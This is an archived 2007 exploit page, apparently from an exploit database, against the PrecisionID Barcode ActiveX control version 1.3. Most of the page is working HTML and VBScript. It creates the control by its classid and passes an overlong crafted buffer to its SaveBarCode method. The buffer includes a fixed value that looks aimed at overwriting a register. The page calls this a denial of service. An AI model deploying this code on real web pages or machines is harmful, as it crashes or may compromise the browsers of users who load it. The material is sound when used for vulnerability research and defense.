PrecisionID Barcode ActiveX version 1.3 denial of service exploit.
2de4f1a8efd72a9d432a0406d6b2e60b90f1d2d2b38247fa90521de5ce86bc39
<pre>
<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/12</b></p></span>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">--------------------------------------------------------------------------------
<b>PrecisionID Barcode ActiveX (PrecisionID_DataMatrix.DLL) 1.3 Denail of Service</b>
url: http://www.precisionid.com/
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
all software that use this ocx are vulnerable to these exploits.
--------------------------------------------------------------------------------
<object classid='clsid:6C951D10-B07F-11DB-A6ED-0050C2490048' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language='vbscript'>
Sub tryMe
buff=String(304,"B")
get_eax = unescape("%D1%60%61%61")
buff2 = String(709,"C")
egg = buff + get_eax + buff2
test.SaveBarCode egg
End Sub
</script>
</span></span>
</code></pre>